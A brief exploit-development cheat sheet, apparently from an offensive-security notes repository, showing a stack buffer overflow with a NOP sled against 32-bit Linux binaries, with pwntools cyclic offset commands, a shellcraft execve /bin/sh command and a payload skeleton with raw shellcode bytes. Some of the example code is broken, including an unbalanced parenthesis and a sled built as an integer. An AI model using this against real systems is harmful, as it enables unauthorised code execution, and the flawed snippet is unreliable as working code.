killchain-compendium/exploit/buffer_overflow/docs/cut_stack_in_half.md

Cut Stack in Half + NOPsled

• Stack has to be executable
• cylic buffer + eip content is esp + half of the stack + NOPsled + shellcode
• ASLR has to be off or eip content address pointing into the sled needs to be fuzzed hard

shellcraft

• for example

shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s

Usage

• measure eip offset via

  cyclic <number>
  

  • Check eip content via gdb

  cyclic -l <eipContent>
  

• Example code

from pwn import *

padding(cyclic(cyclic_find(<eipContent>))
eip = p32(<esp> + some offset into stack)
sled = 90 * 100
shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
payload = padding + eip + sled + shellcode